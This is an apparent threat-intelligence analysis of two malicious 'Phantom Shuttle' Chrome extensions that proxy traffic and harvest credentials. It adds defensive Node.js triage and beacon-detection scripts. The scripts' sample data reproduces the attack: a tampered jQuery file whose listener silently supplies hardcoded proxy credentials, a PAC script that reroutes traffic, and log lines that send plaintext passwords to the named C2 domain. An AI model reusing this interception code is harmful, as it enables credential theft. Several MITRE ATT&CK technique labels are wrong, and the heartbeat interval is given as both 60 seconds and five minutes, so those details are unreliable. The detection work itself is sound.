Full Report
Cybersecurity researchers have discovered two malicious Google Chrome extensions with the same name and published by the same developer that come with capabilities to intercept traffic and capture user credentials. The extensions are advertised as a "multi-location network speed test plug-in" for developers and foreign trade personnel. Both the browser add-ons are available for download as of
Analysis Summary
# Tool/Technique: Malicious Chrome Extensions (Phantom Shuttle Variants)
## Overview
Two malicious Google Chrome extensions, both named "Phantom Shuttle" and published by the same developer, were found to covertly intercept user traffic, capture credentials, and operate as man-in-the-middle (MitM) proxies. They are disguised as legitimate "multi-location network speed test plug-ins" aimed at developers and foreign trade personnel, and are sold behind a subscription facade.
## Technical Details
- Type: Malware (Browser Extension)
- Platform: Google Chrome (Web Browser)
- Capabilities: Traffic interception, credential harvesting (usernames, passwords, credit cards, keys), MitM proxy implementation, C2 communication, and persistent data exfiltration.
- First Seen: One variant published November 26, 2017; the second April 27, 2023.
## MITRE ATT&CK Mapping
- **TA0010 - Exfiltration**
  - T1041 - Exfiltration Over C2 Channel
    - *Functionality relies on the 60-second heartbeat to send credentials.*
- **TA0005 - Defense Evasion**
  - T1216 - Drive-by Compromise (via extension installation)
- **TA0004 - Privilege Escalation**
  - T1548.002 - Abuse Extension Installation
- **TA0002 - Execution**
  - T1204.002 - User Execution: Malicious File (user installs the extension)
- **TA0011 - Command and Control**
  - T1071.001 - Application Layer Protocol: Web Protocols (HTTP GET requests for exfiltration)
## Functionality
### Core Capabilities
- **Traffic Interception and Proxying:** Routes web traffic, in particular traffic to more than 170 targeted high-value domains (e.g., GitHub, AWS, Docker, Facebook), through actor-controlled proxy servers (the "smarty" proxy mode).
- **Credential Injection:** Registers a **`chrome.webRequest.onAuthRequired`** listener in `asyncBlocking` mode that automatically supplies the hardcoded proxy credentials (`topfany` / `963852wei`) whenever an HTTP authentication challenge occurs, so the user never sees an authentication prompt.
- **Credential Harvesting:** Captures sensitive data from targeted sites, including email addresses, plaintext passwords, credit card numbers, authentication cookies, browsing history, API keys, and access tokens.
### Advanced Features
- **Evasion via Deception:** Performs the advertised functions (latency tests, status display) to maintain the illusion of a legitimate VPN/speed test service and hide its primary malicious purpose.
- **Persistent Exfiltration:** Sends a "heartbeat" HTTP GET request every five minutes, transmitting the subscribed ("VIP") user's email address, plaintext password, and extension version number to the C2 server.
- **Proxy Configuration Management:** Uses a Proxy Auto-Configuration (PAC) script to switch between three modes: `close` (proxy disabled), `always` (all traffic proxied), and `smarty` (only traffic to the targeted domains proxied).
- **Man-in-the-Middle (MitM):** Once the browser has authenticated to the actor's proxy, that proxy can capture traffic, manipulate responses, and inject arbitrary content into the session.
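The three indicators above (a silent `onAuthRequired` listener in `asyncBlocking` mode, a hardcoded credential pair, and a PAC script that routes chosen hosts to an actor-controlled proxy) are all visible in an unpacked extension's source, so they can be triaged statically. The following is an added example, not code from the report or from the extension: a small Node.js triage script that takes a manifest object and a map of file name to script source and reports those indicators, extracting the PAC proxy server and routed host patterns as IoCs. The function names, finding labels, and the sample extension at the bottom are constructed for this example; only the `topfany:963852wei` pair and the `jquery-1.12.2.min.js` file name come from the page.

```javascript
// Added example, not code from the report or from the extension itself.
// Static triage of an unpacked Chrome extension: the manifest object and a
// map of file name -> script source go in, a list of findings comes out.
// Function names, the finding "kind" labels and the sample extension at the
// bottom are constructed for this example.

const PERMISSIONS_OF_INTEREST = new Set([
  'proxy', 'webRequest', 'webRequestBlocking', 'webRequestAuthProvider',
  'cookies', 'history',
]);

// Credential pair the report says is hardcoded in the extension (from the page).
const KNOWN_BAD_CREDENTIALS = new Set(['topfany:963852wei']);

const AUTH_CREDENTIALS_RE =
  /authCredentials\s*:\s*\{\s*username\s*:\s*['"]([^'"]*)['"]\s*,\s*password\s*:\s*['"]([^'"]*)['"]/g;
const PAC_PROXY_RE = /PROXY\s+([A-Za-z0-9.-]+:\d{1,5})/g;
const PAC_HOST_MATCH_RE = /(?:shExpMatch|dnsDomainIs)\s*\(\s*host\s*,\s*['"]([^'"]+)['"]\s*\)/g;
const BUNDLED_LIB_RE = /^(jquery|lodash|bootstrap|vue|react)[-.][^/]*\.js$/i;

function triageExtension(manifest, scripts) {
  const findings = [];
  const add = (kind, detail) => findings.push({ kind, detail });

  const perms = [...(manifest.permissions || []), ...(manifest.optional_permissions || [])];
  for (const p of perms) if (PERMISSIONS_OF_INTEREST.has(p)) add('permission', p);

  // MV3 keeps host patterns in host_permissions; MV2 mixed them into permissions.
  const hosts = [...(manifest.host_permissions || []), ...perms];
  const broad = hosts.find((h) => h === '<all_urls>' || /^\*:\/\/\*\//.test(h));
  if (broad) add('broad-host-access', broad);

  for (const [file, src] of Object.entries(scripts)) {
    // A vendored library (jquery-*.min.js) has no business calling chrome.* APIs.
    if (BUNDLED_LIB_RE.test(file) && /\bchrome\.\w+/.test(src)) add('tampered-library', file);

    if (/onAuthRequired\s*\.\s*addListener/.test(src)) {
      add(/['"]asyncBlocking['"]/.test(src) ? 'auth-listener-asyncblocking' : 'auth-listener', file);
    }
    for (const m of src.matchAll(AUTH_CREDENTIALS_RE)) {
      const pair = `${m[1]}:${m[2]}`;
      add(KNOWN_BAD_CREDENTIALS.has(pair) ? 'known-bad-credentials' : 'hardcoded-credentials', `${file}: ${pair}`);
    }
    if (/chrome\.proxy\.settings\.set/.test(src)) add('proxy-settings-set', file);
    if (/FindProxyForURL/.test(src)) {
      // The proxy server(s) and the host patterns routed to them are both IoCs.
      for (const m of src.matchAll(PAC_PROXY_RE)) add('pac-proxy-server', m[1]);
      for (const m of src.matchAll(PAC_HOST_MATCH_RE)) add('pac-routed-host', m[1]);
    }
  }
  return findings;
}

// Worth a manual look: silent proxy auth plus proxy takeover, or a known bad
// credential pair, or a modified bundled library.
function isSuspicious(findings) {
  const kinds = new Set(findings.map((f) => f.kind));
  return (kinds.has('auth-listener-asyncblocking') && kinds.has('proxy-settings-set'))
    || kinds.has('known-bad-credentials')
    || kinds.has('tampered-library');
}

// Constructed sample extension (not the real package) showing the indicators.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'sample speed test (constructed)',
  permissions: ['proxy', 'webRequest', 'webRequestAuthProvider', 'storage'],
  host_permissions: ['<all_urls>'],
};
const SAMPLE_SCRIPTS = {
  'jquery-1.12.2.min.js': String.raw`
    /*! jQuery v1.12.2 | (c) jQuery Foundation | jquery.org/license */
    !function(a,b){"use strict"}(window);
    chrome.webRequest.onAuthRequired.addListener(
      function (details, callback) {
        callback({ authCredentials: { username: "topfany", password: "963852wei" } });
      },
      { urls: ["<all_urls>"] }, ["asyncBlocking"]);
  `,
  'background.js': String.raw`
    const pac = 'function FindProxyForURL(url, host) {'
      + '  if (shExpMatch(host, "*.github.com")) return "PROXY proxy.example.invalid:3128";'
      + '  return "DIRECT"; }';
    chrome.proxy.settings.set({ value: { mode: "pac_script", pacScript: { data: pac } }, scope: "regular" });
  `,
};

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), null, 2));
```

Run it with `node triage.js` against the sample, or replace `SAMPLE_MANIFEST`/`SAMPLE_SCRIPTS` with the parsed `manifest.json` and the files of a real unpacked extension directory. The checks are deliberately regex-based heuristics: an obfuscated or minified-and-renamed listener registration can evade the `onAuthRequired` test, so treat an empty result as "nothing obvious", not as a clean bill of health.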
## Indicators of Compromise
- File Hashes: N/A (Specific hashes not provided in the text)
- File Names: The extensions are named "Phantom Shuttle."
- Registry Keys: N/A (Browser extension configuration)
- Network Indicators: `phantomshuttle[.]space` (C2 server domain)
- Behavioral Indicators:
  - Modification of bundled libraries (`jquery-1.12.2.min.js`, `scripts.js`) with malicious code.
  - Registration of a listener on **`chrome.webRequest.onAuthRequired`**.
  - Outbound HTTP GET requests at five-minute intervals transmitting plaintext credentials.
  - Configuration of Chrome proxy settings from PAC file rules (`close`, `always`, `smarty`).
## Associated Threat Actors
- The threat actor is currently unnamed and is referred to only as "the threat actor"; both extensions were published from the same developer profile.
## Detection Methods
- Signature-based detection: Match the hardcoded proxy credentials (`topfany` / `963852wei`) supplied in response to HTTP authentication challenges.
- Behavioral detection: Monitor for extensions that manipulate `chrome.webRequest` listeners, especially ones registered in `asyncBlocking` mode to answer authentication challenges, and for unauthorized PAC file configuration changes.
- YARA rules: N/A (No specific signature rules provided).
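The network-side counterpart of the detection methods above is the five-minute heartbeat and the hardcoded Basic credential pair. As an added example (not code from the report), the following Node.js script runs two checks over proxy-log lines: it groups outbound GETs by client and destination host, flags pairs whose request cadence is regular, and reports whether the URLs carry credential-looking query parameters or reach the C2 domain named on this page; separately, it decodes a `Proxy-Authorization: Basic` header and compares it with the known bad pair. The log format, the `/api/heartbeat` path, the query parameter names, the client addresses and the benign hosts are all constructed for the example; only the `phantomshuttle.space` domain, the five-minute interval and the `topfany:963852wei` pair come from the page.

```javascript
// Added example, not code from the report. Beacon and credential detection
// over constructed proxy-log lines. The log format, URL path and parameter
// names are assumptions; the C2 host and credential pair are from the page.

const KNOWN_C2_HOSTS = new Set(['phantomshuttle.space']);
const KNOWN_BAD_PROXY_CREDENTIALS = new Set(['topfany:963852wei']);
const CREDENTIAL_PARAM_RE = /^(email|user(name)?|pwd|pass(word)?|token|api_?key|cookie)$/i;

// Assumed log format (constructed): "<ISO timestamp> <client-ip> <METHOD> <url>"
function parseLogLine(line) {
  const [ts, client, method, url] = line.trim().split(/\s+/);
  if (!ts || !client || !method || !url) return null;
  let parsed;
  try { parsed = new URL(url); } catch { return null; }
  return { time: Date.parse(ts), client, method, host: parsed.hostname, params: [...parsed.searchParams.keys()] };
}

// Flags every (client, host) pair with at least `minRequests` GETs whose gaps
// all lie within `tolerance` of the median gap, i.e. a fixed-interval beacon.
function findBeacons(lines, { minRequests = 3, tolerance = 0.1 } = {}) {
  const groups = new Map();
  for (const line of lines) {
    const e = parseLogLine(line);
    if (!e || e.method !== 'GET') continue;
    const key = `${e.client} -> ${e.host}`;
    if (!groups.has(key)) groups.set(key, { client: e.client, host: e.host, times: [], params: new Set() });
    const g = groups.get(key);
    g.times.push(e.time);
    e.params.forEach((p) => g.params.add(p));
  }
  const findings = [];
  for (const g of groups.values()) {
    if (g.times.length < minRequests) continue;
    const t = [...g.times].sort((a, b) => a - b);
    const gaps = t.slice(1).map((x, i) => (x - t[i]) / 1000);
    const sorted = [...gaps].sort((a, b) => a - b);
    const median = sorted[Math.floor(sorted.length / 2)];
    const periodic = median > 0 && gaps.every((gap) => Math.abs(gap - median) <= tolerance * median);
    if (!periodic) continue;
    findings.push({
      client: g.client,
      host: g.host,
      intervalSeconds: median,
      credentialParams: [...g.params].filter((p) => CREDENTIAL_PARAM_RE.test(p)),
      knownC2: KNOWN_C2_HOSTS.has(g.host),
    });
  }
  return findings;
}

// Periodic traffic alone is common (update checks); keep only beacons that
// carry credential-like parameters or reach a known C2 host.
function triageBeacons(lines) {
  return findBeacons(lines).filter((f) => f.knownC2 || f.credentialParams.length > 0);
}

// Decodes an HTTP Basic credential from a Proxy-Authorization header value
// and reports whether it is the pair the report attributes to the extension.
function checkProxyAuthHeader(headerValue) {
  const m = /^Basic\s+([A-Za-z0-9+/=]+)$/.exec(headerValue.trim());
  if (!m) return { basic: false, knownBad: false };
  const pair = Buffer.from(m[1], 'base64').toString('utf8');
  return { basic: true, knownBad: KNOWN_BAD_PROXY_CREDENTIALS.has(pair) };
}

// Constructed sample log: one client beaconing with plaintext credentials,
// the same client browsing normally, and a second client doing a benign
// periodic update check.
const SAMPLE_LOG = [
  '2025-01-10T10:00:00Z 10.0.0.5 GET http://phantomshuttle.space/api/heartbeat?email=victim%40example.test&password=hunter2&version=1.0.3',
  '2025-01-10T10:05:00Z 10.0.0.5 GET http://phantomshuttle.space/api/heartbeat?email=victim%40example.test&password=hunter2&version=1.0.3',
  '2025-01-10T10:10:01Z 10.0.0.5 GET http://phantomshuttle.space/api/heartbeat?email=victim%40example.test&password=hunter2&version=1.0.3',
  '2025-01-10T10:14:59Z 10.0.0.5 GET http://phantomshuttle.space/api/heartbeat?email=victim%40example.test&password=hunter2&version=1.0.3',
  '2025-01-10T10:01:12Z 10.0.0.5 GET https://github.com/login',
  '2025-01-10T10:03:40Z 10.0.0.5 GET https://github.com/settings/keys',
  '2025-01-10T10:12:07Z 10.0.0.5 GET https://github.com/notifications',
  '2025-01-10T10:00:00Z 10.0.0.7 GET https://updates.example.test/check?v=4.2',
  '2025-01-10T10:05:00Z 10.0.0.7 GET https://updates.example.test/check?v=4.2',
  '2025-01-10T10:10:00Z 10.0.0.7 GET https://updates.example.test/check?v=4.2',
];

console.log(JSON.stringify(triageBeacons(SAMPLE_LOG), null, 2));
```

On the sample, `findBeacons` reports both periodic pairs (the heartbeat and the update check), and `triageBeacons` keeps only the heartbeat, with `intervalSeconds: 300`, `credentialParams: ["email", "password"]` and `knownC2: true`. The `Proxy-Authorization` check only applies where the sensor sees the browser-to-proxy leg in clear; if the proxy is reached over TLS the header is not visible on the wire and the beacon cadence is the remaining network signal.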
## Mitigation Strategies
- Prevention measures: Strictly review and allow-list browser extensions; disable side-loading of extensions.
- Hardening recommendations: Audit installed extensions regularly; avoid extensions that request excessive permissions, especially network interception (`proxy`, `webRequest`) or scripting across all sites. Be highly suspicious of "utility" extensions that require payment or a subscription yet demand broad network access.
## Related Tools/Techniques
- Other malicious Chrome extensions involved in traffic interception and credential theft.
- Use of legitimate service facades (VPN/Speed Test) to gain trust for credential harvesting.